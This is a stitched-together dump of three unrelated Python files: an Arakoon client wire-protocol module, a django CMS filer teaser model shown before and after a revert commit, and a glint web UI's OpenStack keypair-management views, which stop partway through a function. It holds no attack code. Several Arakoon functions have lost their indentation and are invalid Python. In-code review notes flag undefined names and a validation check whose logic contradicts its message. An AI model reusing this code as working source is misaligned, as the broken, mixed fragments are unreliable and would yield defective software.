ARA_CMD_KEY_COUNT = 0x0000001a | ARA_CMD_MAG
ARA_CMD_CONFIRM = 0x0000001c | ARA_CMD_MAG
ARA_CMD_GET_NURSERY_CFG = 0x00000020 | ARA_CMD_MAG
ARA_CMD_REV_RAN_E = 0x00000023 | ARA_CMD_MAG
ARA_CMD_SYNCED_SEQUENCE = 0x00000024 | ARA_CMD_MAG
ARA_CMD_DELETE_PREFIX = 0x00000027 | ARA_CMD_MAG
ARA_CMD_VERSION = 0x00000028 | ARA_CMD_MAG
ARA_CMD_ASSERT_EXISTS = 0x00000029 | ARA_CMD_MAG
# Arakoon error codes
# Success
ARA_ERR_SUCCESS = 0
# No entity
ARA_ERR_NO_ENT = 1
# Node is not the master
ARA_ERR_NOT_MASTER = 4
# not found
ARA_ERR_NOT_FOUND = 5
# wrong cluster
ARA_ERR_WRONG_CLUSTER = 6
ARA_ERR_ASSERTION_FAILED = 7
ARA_ERR_RANGE_ERROR = 9
ARA_ERR_GOING_DOWN = 16
ARA_ERR_ASSERTEXISTS_FAILED = 17
# Type tags used by the named-field (statistics) encoding
NAMED_FIELD_TYPE_INT = 1
NAMED_FIELD_TYPE_INT64 = 2
NAMED_FIELD_TYPE_FLOAT = 3
NAMED_FIELD_TYPE_STRING = 4
NAMED_FIELD_TYPE_LIST = 5
def _packString( toPack ):
toPackLength = len( toPack )
return struct.pack("I%ds" % ( toPackLength), toPackLength, toPack )
def _packStringOption(toPack = None):
    """Serialize an optional string: a presence flag, then the string if set."""
    if toPack is None:
        return _packBool(0)
    return _packBool(1) + _packString(toPack)
def _packInt ( toPack ):
return struct.pack( "I", toPack )
def _packInt64 ( toPack ):
return struct.pack( "q", toPack )
def _packSignedInt ( toPack ):
return struct.pack( "i", toPack )
def _packBool ( toPack) :
return struct.pack( "?", toPack)
def sendPrologue(socket, clusterId):
    """Send the protocol prologue: magic, version, then the cluster id."""
    prologue = _packInt(ARA_CMD_MAG) + _packInt(ARA_CMD_VER) + _packString(clusterId)
    socket.sendall(prologue)
def _readExactNBytes( con, n ):
if not con._connected :
raise ArakoonSockRecvClosed()
bytesRemaining = n
tmpResult = ""
timeout = ArakoonClientConfig.getConnectionTimeout()
while bytesRemaining > 0 :
tripleList = select.select( [con._socket] , [] , [] , timeout )
if ( len ( tripleList [0]) != 0 ) :
newChunk = ""
try :
newChunk = tripleList [0][0].recv ( bytesRemaining)
except Exception, ex:
ArakoonClientLogger.logError ("Error while receiving from socket. %s: '%s'" % (ex.__class__.__name__, ex) )
con._connected = False
raise ArakoonSockRecvError()
newChunkSize = len( newChunk )
if newChunkSize == 0 :
try:
con._socket.close()
except Exception, ex:
ArakoonClientLogger.logError( "Error while closing socket. %s: %s" % (ex.__class__.__name__,ex))
con._connected = False
raise ArakoonSockReadNoBytes ()
tmpResult = tmpResult + newChunk
bytesRemaining = bytesRemaining - newChunkSize
else :
try:
con._socket.close()
except Exception, ex:
ArakoonClientLogger.logError( "Error while closing socket. %s: %s" % (ex.__class__.__name__,ex))
con._connected = False
msg = con._socket.getpeername()
raise ArakoonSockNotReadable(msg = msg)
return tmpResult
def _recvString(con):
    """Read a length-prefixed string from the connection."""
    size = _recvInt(con)
    data = _readExactNBytes(con, size)
    return struct.unpack("%ds" % size, data)[0]
def _unpackInt(buf, offset):
    """Read an unsigned 32-bit int at *offset*; return (value, new offset)."""
    value = struct.unpack_from("I", buf, offset)[0]
    return value, offset + ARA_TYPE_INT_SIZE
def _unpackSignedInt(buf, offset):
    """Read a signed 32-bit int at *offset*; return (value, new offset)."""
    value = struct.unpack_from("i", buf, offset)[0]
    return value, offset + ARA_TYPE_INT_SIZE
def _unpackInt64(buf, offset):
r= struct.unpack_from("q", buf, offset)
return r[0], offset + 8
def _unpackString(buf, offset):
    """Read a length-prefixed string at *offset*; return (value, new offset)."""
    size, start = _unpackInt(buf, offset)
    end = start + size
    return buf[start:end], end
def _unpackStringList(buf, offset):
    """Read a counted list of length-prefixed strings; return (list, new offset)."""
    count, offset = _unpackInt(buf, offset)
    items = []
    for _ in range(count):
        item, offset = _unpackString(buf, offset)
        items.append(item)
    return items, offset
def _unpackNamedField(buf, offset):
    """Decode one named statistics field into a single-entry dict.

    Returns (dict, new offset). LIST fields decode recursively into a
    nested dictionary. Raises ArakoonException on an unknown field type.
    """
    # renamed from 'type' to avoid shadowing the builtin
    fieldType, offset = _unpackInt(buf, offset)
    name, offset = _unpackString(buf, offset)
    result = dict()
    if fieldType == NAMED_FIELD_TYPE_INT:
        result[name], offset = _unpackInt(buf, offset)
        return result, offset
    if fieldType == NAMED_FIELD_TYPE_INT64:
        result[name], offset = _unpackInt64(buf, offset)
        return result, offset
    if fieldType == NAMED_FIELD_TYPE_FLOAT:
        result[name], offset = _unpackFloat(buf, offset)
        return result, offset
    if fieldType == NAMED_FIELD_TYPE_STRING:
        result[name], offset = _unpackString(buf, offset)
        return result, offset
    if fieldType == NAMED_FIELD_TYPE_LIST:
        length, offset = _unpackInt(buf, offset)
        localDict = dict()
        for i in range(length):
            field, offset = _unpackNamedField(buf, offset)
            localDict.update(field)
        result[name] = localDict
        return result, offset
    raise ArakoonException("Cannot decode named field %s. Invalid type: %d" % (name, fieldType))
def _recvInt(con):
    """Read one unsigned int from the connection."""
    raw = _readExactNBytes(con, ARA_TYPE_INT_SIZE)
    value, _ = _unpackInt(raw, 0)
    return value
def _recvInt64(con):
    """Read one signed 64-bit int from the connection."""
    raw = _readExactNBytes(con, ARA_TYPE_INT64_SIZE)
    value, _ = _unpackInt64(raw, 0)
    return value
def _unpackBool(buf, offset):
r = struct.unpack_from( "?", buf, offset) [0]
return r, offset+1
def _recvBool(con):
    """Read one boolean byte from the connection."""
    raw = _readExactNBytes(con, 1)
    value, _ = _unpackBool(raw, 0)
    return value
def _unpackFloat(buf, offset):
r = struct.unpack_from("d", buf, offset)
return r[0], offset+8
def _recvFloat(con):
    """Read one 64-bit double from the connection.

    Bug fix: the parameter was named `buf` while the body used the
    undefined name `con`, so every call raised NameError. The parameter
    is now named `con` like every other _recv* helper in this module.
    """
    raw = _readExactNBytes(con, 8)
    value, _ = _unpackFloat(raw, 0)
    return value
def _recvStringOption(con):
    """Read an optional string: a presence flag, then the value if set."""
    if not _recvBool(con):
        return None
    return _recvString(con)
class Update(object):
    """Abstract base for sequence updates; subclasses implement write(fob)."""
    pass
class Set(Update):
    """Sequence update: store `value` under `key` (opcode 1)."""

    def __init__(self, key, value):
        self._key = key
        self._value = value

    def write(self, fob):
        # Serialize as one buffer: opcode, key, value.
        fob.write(_packInt(1) + _packString(self._key) + _packString(self._value))
class Delete(Update):
    """Sequence update: remove `key` (opcode 2)."""

    def __init__(self, key):
        self._key = key

    def write(self, fob):
        fob.write(_packInt(2) + _packString(self._key))
class Assert(Update):
    """Sequence update: assert `key` holds value-option `vo` (opcode 8)."""

    def __init__(self, key, vo):
        self._key = key
        self._vo = vo

    def write(self, fob):
        fob.write(_packInt(8) + _packString(self._key) + _packStringOption(self._vo))
class AssertExists(Update):
    """Sequence update: assert `key` exists (opcode 15)."""

    def __init__(self, key):
        self._key = key

    def write(self, fob):
        fob.write(_packInt(15) + _packString(self._key))
class Sequence(Update):
    """Ordered batch of updates applied as one server-side unit (opcode 5)."""
    def __init__(self):
        self._updates = []
    def addUpdate(self,u):
        # Append any pre-built Update instance.
        self._updates.append(u)
    @SignatureValidator( 'string', 'string' )
    def addSet(self, key,value):
        self._updates.append(Set(key,value))
    @SignatureValidator( 'string' )
    def addDelete(self, key):
        self._updates.append(Delete(key))
    def addAssert(self, key,vo):
        self._updates.append(Assert(key,vo))
    def addAssertExists(self, key):
        self._updates.append(AssertExists(key))
    def write(self, fob):
        # Opcode 5, update count, then each update in insertion order.
        fob.write( _packInt(5))
        fob.write( _packInt(len(self._updates)))
        for update in self._updates:
            update.write(fob)
class ArakoonProtocol :
    """Wire-protocol helpers for the Arakoon client.

    encode* methods build the byte string for one client command;
    decode* methods read a reply from an open connection, first checking
    the status code (raising the mapped Arakoon exception on failure)
    and then reading the payload.

    Changes: removed a leftover debug print in encodeAssertExists,
    renamed a local that shadowed the builtin `buffer`, and replaced the
    quadratic prepend loops in the list decoders with linear equivalents.
    """

    @staticmethod
    def encodePing(clientId, clusterId):
        r = _packInt(ARA_CMD_HEL)
        r += _packString(clientId)
        r += _packString(clusterId)
        return r

    @staticmethod
    def encodeGetVersion():
        return _packInt(ARA_CMD_VERSION)

    @staticmethod
    def encodeWhoMaster():
        return _packInt(ARA_CMD_WHO)

    @staticmethod
    def encodeExists(key, allowDirty):
        msg = _packInt(ARA_CMD_EXISTS)
        msg += _packBool(allowDirty)
        msg += _packString(key)
        return msg

    @staticmethod
    def encodeAssert(key, vo, allowDirty):
        msg = _packInt(ARA_CMD_ASSERT)
        msg += _packBool(allowDirty)
        msg += _packString(key)
        msg += _packStringOption(vo)
        return msg

    @staticmethod
    def encodeAssertExists(key, allowDirty):
        # (a stray debug print statement was removed here)
        msg = _packInt(ARA_CMD_ASSERT_EXISTS)
        msg += _packBool(allowDirty)
        msg += _packString(key)
        return msg

    @staticmethod
    def encodeGet(key, allowDirty):
        msg = _packInt(ARA_CMD_GET)
        msg += _packBool(allowDirty)
        msg += _packString(key)
        return msg

    @staticmethod
    def encodeSet(key, value):
        return _packInt(ARA_CMD_SET) + _packString(key) + _packString(value)

    @staticmethod
    def encodeConfirm(key, value):
        return _packInt(ARA_CMD_CONFIRM) + _packString(key) + _packString(value)

    @staticmethod
    def encodeSequence(seq, sync):
        # The sequence is serialized into a buffer and sent as one string.
        r = cStringIO.StringIO()
        seq.write(r)
        flattened = r.getvalue()
        r.close()
        cmd = ARA_CMD_SEQ
        if sync:
            cmd = ARA_CMD_SYNCED_SEQUENCE
        return _packInt(cmd) + _packString(flattened)

    @staticmethod
    def encodeDelete(key):
        return _packInt(ARA_CMD_DEL) + _packString(key)

    @staticmethod
    def encodeRange(bKey, bInc, eKey, eInc, maxCnt, allowDirty):
        retVal = _packInt(ARA_CMD_RAN) + _packBool(allowDirty)
        retVal += _packStringOption(bKey) + _packBool(bInc)
        retVal += _packStringOption(eKey) + _packBool(eInc) + _packSignedInt(maxCnt)
        return retVal

    @staticmethod
    def encodeRangeEntries(first, finc, last, linc, maxEntries, allowDirty):
        r = _packInt(ARA_CMD_RAN_E) + _packBool(allowDirty)
        r += _packStringOption(first) + _packBool(finc)
        r += _packStringOption(last) + _packBool(linc)
        r += _packSignedInt(maxEntries)
        return r

    @staticmethod
    def encodeReverseRangeEntries(first, finc, last, linc, maxEntries, allowDirty):
        r = _packInt(ARA_CMD_REV_RAN_E) + _packBool(allowDirty)
        r += _packStringOption(first) + _packBool(finc)
        r += _packStringOption(last) + _packBool(linc)
        r += _packSignedInt(maxEntries)
        return r

    @staticmethod
    def encodePrefixKeys(key, maxCnt, allowDirty):
        retVal = _packInt(ARA_CMD_PRE) + _packBool(allowDirty)
        retVal += _packString(key)
        retVal += _packSignedInt(maxCnt)
        return retVal

    @staticmethod
    def encodeTestAndSet(key, oldVal, newVal):
        retVal = _packInt(ARA_CMD_TAS) + _packString(key)
        retVal += _packStringOption(oldVal)
        retVal += _packStringOption(newVal)
        return retVal

    @staticmethod
    def encodeMultiGet(keys, allowDirty):
        retVal = _packInt(ARA_CMD_MULTI_GET) + _packBool(allowDirty)
        retVal += _packInt(len(keys))
        for key in keys:
            retVal += _packString(key)
        return retVal

    @staticmethod
    def encodeExpectProgressPossible():
        return _packInt(ARA_CMD_EXPECT_PROGRESS_POSSIBLE)

    @staticmethod
    def encodeStatistics():
        return _packInt(ARA_CMD_STATISTICS)

    @staticmethod
    def encodeUserFunction(name, argument):
        retVal = _packInt(ARA_CMD_USER_FUNCTION)
        retVal += _packString(name)
        retVal += _packStringOption(argument)
        return retVal

    @staticmethod
    def encodeDeletePrefix(prefix):
        retVal = _packInt(ARA_CMD_DELETE_PREFIX)
        retVal += _packString(prefix)
        return retVal

    @staticmethod
    def _evaluateErrorCode( con ):
        """Read the reply's status code; raise the mapped exception on failure."""
        errorCode = _recvInt ( con )
        if errorCode == ARA_ERR_SUCCESS :
            return
        # Every non-success reply carries an error message.
        errorMsg = _recvString ( con )
        if errorCode == ARA_ERR_NOT_FOUND:
            raise ArakoonNotFound(errorMsg)
        if errorCode == ARA_ERR_NOT_MASTER:
            raise ArakoonNodeNotMaster()
        if errorCode == ARA_ERR_ASSERTION_FAILED:
            raise ArakoonAssertionFailed(errorMsg)
        if errorCode == ARA_ERR_ASSERTEXISTS_FAILED:
            raise ArakoonAssertExistsFailed(errorMsg)
        if errorCode == ARA_ERR_RANGE_ERROR:
            raise NurseryRangeError(errorMsg)
        if errorCode == ARA_ERR_GOING_DOWN:
            raise ArakoonGoingDown(errorMsg)
        # Unknown error code: raise the generic exception.
        raise ArakoonException( "EC=%d. %s" % (errorCode, errorMsg) )

    @staticmethod
    def decodeInt64Result( con ) :
        ArakoonProtocol._evaluateErrorCode( con )
        return _recvInt64( con )

    @staticmethod
    def decodeIntResult(con):
        ArakoonProtocol._evaluateErrorCode(con)
        return _recvInt(con)

    @staticmethod
    def decodeVoidResult( con ):
        ArakoonProtocol._evaluateErrorCode( con )

    @staticmethod
    def decodeBoolResult( con ):
        ArakoonProtocol._evaluateErrorCode( con )
        return _recvBool( con )

    @staticmethod
    def decodeStringResult ( con ):
        ArakoonProtocol._evaluateErrorCode( con )
        return _recvString( con )

    @staticmethod
    def decodeStringOptionResult ( con ):
        ArakoonProtocol._evaluateErrorCode( con )
        return _recvStringOption( con )

    @staticmethod
    def decodeStringListResult( con ):
        ArakoonProtocol._evaluateErrorCode( con )
        arraySize = _recvInt( con )
        # Build in receive order, then reverse: same result as the former
        # prepend-per-item loop, but O(n) instead of O(n^2).
        retVal = [ _recvString( con ) for _ in range( arraySize ) ]
        retVal.reverse()
        return retVal

    @staticmethod
    def decodeNurseryCfgResult( con ):
        ArakoonProtocol._evaluateErrorCode(con)
        offset = 0
        encoded = _recvString( con )
        routing, offset = RoutingInfo.unpack(encoded, offset, _unpackBool, _unpackString)
        cfgCount, offset = _unpackInt(encoded, offset)
        resultCfgs = {}
        for i in range(cfgCount) :
            clusterId, offset = _unpackString(encoded, offset)
            clusterSize, offset = _unpackInt(encoded, offset)
            cfg = dict()
            for j in range(clusterSize):
                nodeId, offset = _unpackString(encoded, offset)
                ips, offset = _unpackStringList(encoded, offset)
                port, offset = _unpackInt(encoded, offset)
                cfg[nodeId] = (ips,port)
            cliCfg = ArakoonClientConfig(clusterId, cfg)
            resultCfgs[clusterId] = cliCfg
        return (routing, resultCfgs)

    @staticmethod
    def decodeStringPairListResult(con):
        ArakoonProtocol._evaluateErrorCode(con)
        size = _recvInt( con )
        # Each pair is key then value; the result preserves the former
        # prepend-per-item (reversed) order without the quadratic cost.
        result = [ ( _recvString( con ), _recvString( con ) ) for _ in range(size) ]
        result.reverse()
        return result

    @staticmethod
    def decodeStatistics(con):
        ArakoonProtocol._evaluateErrorCode(con)
        # 'payload' avoids shadowing the builtin `buffer`.
        payload = _recvString(con)
        result, offset = _unpackNamedField(payload, 0)
        return result['arakoon_stats']

    @staticmethod
    def decodeVersionResult(con):
        ArakoonProtocol._evaluateErrorCode(con)
        major = _recvInt(con)
        minor = _recvInt(con)
        patch = _recvInt(con)
        info = _recvString(con)
        return (major,minor, patch, info)

    @staticmethod
    def encodeGetKeyCount () :
        return _packInt(ARA_CMD_KEY_COUNT)

    @staticmethod
    def encodeGetNurseryCfg ():
        return _packInt(ARA_CMD_GET_NURSERY_CFG)
|
from django.utils.translation import ugettext_lazy as _
from django.db import models
from cms.models import CMSPlugin
from cms.models.fields import PageField
from filer.fields.image import FilerImageField
from django.conf import settings
# Per-project override for the teaser "style" dropdown choices.
CMSPLUGIN_FILER_TEASER_STYLE_CHOICES = getattr( settings, 'CMSPLUGIN_FILER_TEASER_STYLE_CHOICES',() )

class FilerTeaser(CMSPlugin):
    """
    A Teaser
    """
    title = models.CharField(_("title"), max_length=255, blank=True)
    # NOTE(review): FilerImageField subclasses ForeignKey, whose first
    # positional argument is the related model -- passing _("image") here
    # is suspect (a later revision of this file drops it); confirm intent.
    image = FilerImageField(_("image"), blank=True, null=True)
    # NOTE(review): URLField's verify_exists keyword was removed in Django 1.5.
    image_url = models.URLField(_("alternative image url"), verify_exists=False, null=True, blank=True, default=None)
    style = models.CharField(_("teaser style"), max_length=255, null=True, blank=True, choices=CMSPLUGIN_FILER_TEASER_STYLE_CHOICES)
    use_autoscale = models.BooleanField(_("use automatic scaling"), default=True,
                                        help_text=_('tries to auto scale the image based on the placeholder context'))
    width = models.PositiveIntegerField(_("width"), null=True, blank=True)
    height = models.PositiveIntegerField(_("height"), null=True, blank=True)
    free_link = models.CharField(_("link"), max_length=255, blank=True, null=True, help_text=_("if present image will be clickable"))
    page_link = PageField(verbose_name=_("page"), null=True, blank=True, help_text=_("if present image will be clickable"))
    description = models.TextField(_("description"), blank=True, null=True)
    target_blank = models.BooleanField(_("open link in new window"), default=False)

    def clean(self):
        """Model-level validation run by full_clean()."""
        from django.core.exceptions import ValidationError
        # Make sure that either image or image_url is set
        # NOTE(review): this raises when BOTH are set, yet the message reads
        # as though it fires when NEITHER is set -- one of the two is wrong.
        if self.image and self.image_url:
            raise ValidationError(_('Either an image or an image url must be selected.'))

    def __unicode__(self):
        return self.title

    @property
    def link(self):
        """URL the teaser points at: free_link takes precedence over page_link.

        NOTE(review): 'self.page_link and self.page_link' repeats the same
        test, and on exception the error is printed while None (not '') is
        returned implicitly.
        """
        try:
            if self.free_link:
                return self.free_link
            elif self.page_link and self.page_link:
                return self.page_link.get_absolute_url()
            else:
                return ''
        except Exception, e:
            print e
Revert "added missing field names translation strings"
This reverts commit 2e3bd0f874b850f61da080bb03ab6949aeebe2a6.
from django.utils.translation import ugettext_lazy as _
from django.db import models
from cms.models import CMSPlugin
from cms.models.fields import PageField
from filer.fields.image import FilerImageField
from django.conf import settings
# Per-project override for the teaser "style" dropdown choices.
CMSPLUGIN_FILER_TEASER_STYLE_CHOICES = getattr( settings, 'CMSPLUGIN_FILER_TEASER_STYLE_CHOICES',() )

class FilerTeaser(CMSPlugin):
    """
    A Teaser
    """
    title = models.CharField(_("title"), max_length=255, blank=True)
    image = FilerImageField(blank=True, null=True)
    # NOTE(review): URLField's verify_exists keyword was removed in Django 1.5.
    image_url = models.URLField(_("alternative image url"), verify_exists=False, null=True, blank=True, default=None)
    style = models.CharField(_("teaser style"), max_length=255, null=True, blank=True, choices=CMSPLUGIN_FILER_TEASER_STYLE_CHOICES)
    use_autoscale = models.BooleanField(_("use automatic scaling"), default=True,
                                        help_text=_('tries to auto scale the image based on the placeholder context'))
    width = models.PositiveIntegerField(null=True, blank=True)
    height = models.PositiveIntegerField(null=True, blank=True)
    free_link = models.CharField(_("link"), max_length=255, blank=True, null=True, help_text=_("if present image will be clickable"))
    page_link = PageField(verbose_name=_("page"), null=True, blank=True, help_text=_("if present image will be clickable"))
    description = models.TextField(_("description"), blank=True, null=True)
    target_blank = models.BooleanField(_("open link in new window"), default=False)

    def clean(self):
        """Model-level validation run by full_clean()."""
        from django.core.exceptions import ValidationError
        # Make sure that either image or image_url is set
        # NOTE(review): this raises when BOTH are set, yet the message reads
        # as though it fires when NEITHER is set -- one of the two is wrong.
        if self.image and self.image_url:
            raise ValidationError(_('Either an image or an image url must be selected.'))

    def __unicode__(self):
        return self.title

    @property
    def link(self):
        """URL the teaser points at: free_link takes precedence over page_link.

        NOTE(review): 'self.page_link and self.page_link' repeats the same
        test, and on exception the error is printed while None (not '') is
        returned implicitly.
        """
        try:
            if self.free_link:
                return self.free_link
            elif self.page_link and self.page_link:
                return self.page_link.get_absolute_url()
            else:
                return ''
        except Exception, e:
            print e
|
from django.http import HttpResponse
from django.http import StreamingHttpResponse
from django.core.exceptions import PermissionDenied
from django.shortcuts import render, redirect
import glintwebui.config as config
from .__version__ import version
from .db_util import get_db_base_and_session
from .utils import get_keypair, delete_keypair, transfer_keypair, create_keypair, create_new_keypair
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
from sqlalchemy.ext.automap import automap_base
def manage_keys(request, group_name=None, message=None):
    """Render the keypair-management page for a group.

    Builds key_dict keyed by "<fingerprint>;<key_name>", mapping each
    cloud name to a boolean that says whether the key is present there.

    NOTE(review): verifyUser/getUser are not defined or imported in this
    module revision -- calling this view raises NameError unless they are
    provided elsewhere; a later revision adds them.
    """
    if not verifyUser(request):
        raise PermissionDenied
    user_obj = getUser(request)
    if group_name is None:
        group_name = user_obj.active_group
    # Automapped table classes from the csv2 schema.
    Base, session = get_db_base_and_session()
    Group_Resources = Base.classes.csv2_group_resources
    Keypairs = Base.classes.csv2_keypairs
    User_Group = Base.classes.csv2_user_groups
    user_groups = session.query(User_Group).filter(User_Group.username == user_obj.username)
    group_list = []
    for grp in user_groups:
        grp_name = grp.group_name
        group_list.append(grp_name)
    grp_resources = session.query(Group_Resources).filter(Group_Resources.group_name == group_name)
    key_dict = {}
    num_clouds=0
    for cloud in grp_resources:
        num_clouds=num_clouds+1
        # Default every key seen so far to "absent" on this cloud.
        for key in key_dict:
            key_dict[key][cloud.cloud_name] = False
        cloud_keys = session.query(Keypairs).filter(Keypairs.cloud_name == cloud.cloud_name, Keypairs.group_name == cloud.group_name)
        for key in cloud_keys:
            # issue of renaming here if keys have different names on different clouds
            # the keys will have a unique fingerprint and that is what is used as an identifier
            if (key.fingerprint + ";" + key.key_name) in key_dict:
                dict_key = key.fingerprint + ";" + key.key_name
                key_dict[dict_key][key.cloud_name] = True
            else:
                dict_key = key.fingerprint + ";" + key.key_name
                key_dict[dict_key] = {}
                key_dict[dict_key]["name"] = key.key_name
                key_dict[dict_key][key.cloud_name] = True
    context = {
        "group_resources": grp_resources,
        "key_dict": key_dict,
        "active_group": group_name,
        "message": message,
        "enable_glint": True,
        "user_groups": group_list,
        "num_clouds": num_clouds
    }
    # need to create template
    return render(request, 'glintwebui/manage_keys.html', context)
def upload_keypair(request, group_name=None):
    """Import a user-supplied public key onto each selected cloud (POST only).

    On an invalid key string, re-renders manage_keys with an error
    message; on success, redirects back to manage_keys.

    NOTE(review): `logger` is not defined in this module revision -- the
    error paths raise NameError; a later revision adds the logger.
    """
    if not verifyUser(request):
        raise PermissionDenied
    if request.method == 'POST':
        # set up database objects
        Base, session = get_db_base_and_session()
        Group_Resources = Base.classes.csv2_group_resources
        Keypairs = Base.classes.csv2_keypairs
        user = getUser(request)
        # get list of target clouds to upload key to
        cloud_name_list = request.POST.getlist('clouds')
        key_name = request.POST.get("key_name")
        key_string = request.POST.get("key_string")
        grp = request.POST.get("group_name")
        for cloud in cloud_name_list:
            db_cloud = session.query(Group_Resources).filter(Group_Resources.group_name == grp, Group_Resources.cloud_name == cloud).first()
            try:
                new_key = create_keypair(key_name=key_name, key_string=key_string, cloud=db_cloud)
            except Exception as exc:
                logger.error("Failed openstack request to make keypair")
                logger.error(exc)
                logger.error("%s is likely an invalid keystring" % key_string)
                message = "unable to upload key: '%s' is likely an invalid keystring" % key_string
                return manage_keys(request=request, group_name=grp, message=message)
            keypair_dict = {
                "group_name": grp,
                "cloud_name": cloud,
                "fingerprint": new_key.fingerprint,
                "key_name": key_name
            }
            new_keypair = Keypairs(**keypair_dict)
            session.merge(new_keypair)
            try:
                session.commit()
            except Exception as exc:
                logger.error(exc)
                logger.error("Error committing database session after creating new key")
                logger.error("openstack and the database may be out of sync until next keypair poll cycle")
        return redirect("manage_keys")
    else:
        #not a post do nothing
        return None
    # Unreachable: both branches above return.
    return None
def new_keypair(request, group_name=None,):
    """Create a brand-new keypair on each selected cloud (POST only).

    Aborts with an error page if the key name is already in use on any
    target cloud; keys created on earlier clouds in the loop are kept.

    NOTE(review): this revision calls logging.info without importing
    `logging`, and `logger`/`verifyUser`/`getUser` are also undefined
    here -- a later revision of this module fixes the imports.
    """
    if not verifyUser(request):
        raise PermissionDenied
    if request.method == 'POST':
        # set up database objects
        Base, session = get_db_base_and_session()
        Group_Resources = Base.classes.csv2_group_resources
        Keypairs = Base.classes.csv2_keypairs
        user = getUser(request)
        # get list of target clouds to upload key to
        cloud_name_list = request.POST.getlist('clouds')
        key_name = request.POST.get("key_name")
        grp = request.POST.get("group_name")
        # Only check that needs to be made is if the key name is used on any of the target clouds
        for cloud in cloud_name_list:
            db_keypair = session.query(Keypairs).filter(Keypairs.group_name == grp, Keypairs.cloud_name == cloud, Keypairs.key_name == key_name).one_or_none()
            if db_keypair is None:
                #no entry exists, its safe to create this keypair
                logging.info("creating new keypair %s on cloud %s" % (key_name, cloud))
                #get grp resources obj
                cloud_obj = session.query(Group_Resources).filter(Group_Resources.group_name == grp, Group_Resources.cloud_name == cloud).one()
                new_key = create_new_keypair(key_name=key_name, cloud=cloud_obj)
                keypair_dict = {
                    "group_name": grp,
                    "cloud_name": cloud,
                    "fingerprint": new_key.fingerprint,
                    "key_name": key_name
                }
                new_keypair = Keypairs(**keypair_dict)
                session.merge(new_keypair)
                try:
                    session.commit()
                except Exception as exc:
                    logger.error(exc)
                    logger.error("Error committing database session after creating new key")
                    logger.error("openstack and the database may be out of sync until next keypair poll cycle")
            else:
                #keypair name exists on this cloud
                message = "Keypair name %s in use on cloud: %s. Aborting transation, keypair may have been created on some clouds" % (key_name, cloud)
                logger.error(message)
                return manage_keys(request=request, group_name=grp, message=message)
        return redirect("manage_keys")
    else:
        #not a post do nothing
        return None
def save_keypairs(request, group_name=None, message=None):
    """Sync checkbox state from the manage_keys form to the clouds (POST only).

    Pass 1 transfers every checked key to clouds that lack it; pass 2
    deletes keys that were unchecked. Redirects to manage_keys when done.

    NOTE(review): `logger`, `verifyUser` and `getUser` are not defined in
    this module revision; a later revision adds them.
    """
    if not verifyUser(request):
        raise PermissionDenied
    user_obj = getUser(request)
    if group_name is None:
        group_name = user_obj.active_group
    if group_name is None:
        return None
    if request.method == 'POST':
        try:
            #set up database objects
            Base, session = get_db_base_and_session()
            Group_Resources = Base.classes.csv2_group_resources
            Keypairs = Base.classes.csv2_keypairs
            # get list of clouds for this group
            # for each cloud: check_list = request.POST.getlist(cloud.cloud_name)
            # check the checklist for diffs (add/remove keys)
            grp_resources = session.query(Group_Resources).filter(Group_Resources.group_name == group_name)
            logger.info("Checking for keys to transfer")
            for cloud in grp_resources:
                #check_list will only have the names of keys checked for that cloud
                check_list = request.POST.getlist(cloud.cloud_name)
                #cross reference check list against what is in database:
                cloud_keys = session.query(Keypairs).filter(Keypairs.group_name == group_name, Keypairs.cloud_name == cloud.cloud_name)
                cloud_fingerprints = []
                for keypair in cloud_keys:
                    cloud_fingerprints.append(keypair.fingerprint + ";" + keypair.key_name)
                # check for new key transfers
                for keypair_key in check_list:
                    if keypair_key not in cloud_fingerprints:
                        # transfer key to this cloud
                        logger.info("%s not found in %s" % (keypair_key, cloud_fingerprints))
                        logger.info("Found key: %s to transfer to %s" % (keypair_key, cloud.cloud_name))
                        split_key = keypair_key.split(";")
                        fingerprint = split_key[0]
                        key_name = split_key[1]
                        # get existing keypair: need name, public_key, key_type and ?user?
                        logger.info("getting source keypair database object...")
                        src_keypair = session.query(Keypairs).filter(Keypairs.fingerprint == fingerprint, Keypairs.key_name == key_name).first()
                        # get group resources corresponding to that keypair
                        logger.info("getting source cloud...")
                        src_cloud = session.query(Group_Resources).filter(Group_Resources.group_name == src_keypair.group_name, Group_Resources.cloud_name == src_keypair.cloud_name).first()
                        # download key from that group resources
                        logger.info("getting source keypair openstack object...")
                        os_keypair = get_keypair(keypair_key, src_cloud)
                        # upload key to current "cloud"
                        logger.info("transferring keypair...")
                        transfer_keypair(os_keypair, cloud)
                        keypair_dict = {
                            "group_name": group_name,
                            "cloud_name": cloud.cloud_name,
                            "fingerprint": fingerprint,
                            "key_name": key_name
                        }
                        new_keypair = Keypairs(**keypair_dict)
                        session.merge(new_keypair)
                        try:
                            session.commit()
                        except Exception as exc:
                            logger.error(exc)
                            logger.error("Error committing database session after proccessing key transfers")
                            logger.error("openstack and the database may be out of sync until next keypair poll cycle")
            # we need to do the entire loop of the clouds twice so we can do all the transfers, then all the deletes
            logger.info("Checking for keys to delete")
            for cloud in grp_resources:
                #check_list will only have the names of keys checked for that cloud
                check_list = request.POST.getlist(cloud.cloud_name)
                #cross reference check list against what is in database:
                cloud_keys = session.query(Keypairs).filter(Keypairs.group_name == group_name, Keypairs.cloud_name == cloud.cloud_name)
                for keypair in cloud_keys:
                    if (keypair.fingerprint + ";" + keypair.key_name) not in check_list:
                        # key has been deleted from this cloud:
                        logger.info("Found key to delete: %s" % keypair.key_name)
                        delete_keypair(keypair.key_name, cloud)
                        # delete from database
                        session.delete(keypair)
                        try:
                            session.commit()
                        except Exception as exc:
                            logger.error(exc)
                            logger.error("Error committing database session after proccessing key transfers")
                            logger.error("openstack and the database may be out of sync until next keypair poll cycle")
        except Exception as exc:
            logger.error(exc)
            logger.error("Error setting up database objects or during general execution of save_keypairs")
        return redirect("manage_keys")
    # not a post, do nothing
    return None
add view support functions and logger import
import logging
from django.http import HttpResponse
from django.http import StreamingHttpResponse
from django.core.exceptions import PermissionDenied
from django.shortcuts import render, redirect
import glintwebui.config as config
from .__version__ import version
from .db_util import get_db_base_and_session
from .utils import get_keypair, delete_keypair, transfer_keypair, create_keypair, create_new_keypair
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
from sqlalchemy.ext.automap import automap_base
logger = logging.getLogger('glintv2')

def getUser(request):
    """Resolve the authenticated csv2 user for this request.

    Matches REMOTE_USER against each user's cert_cn or username and
    returns the matching row; returns None when no row matches.
    """
    remote_user = request.META.get('REMOTE_USER')
    Base, session = get_db_base_and_session()
    Glint_User = Base.classes.csv2_user
    for candidate in session.query(Glint_User):
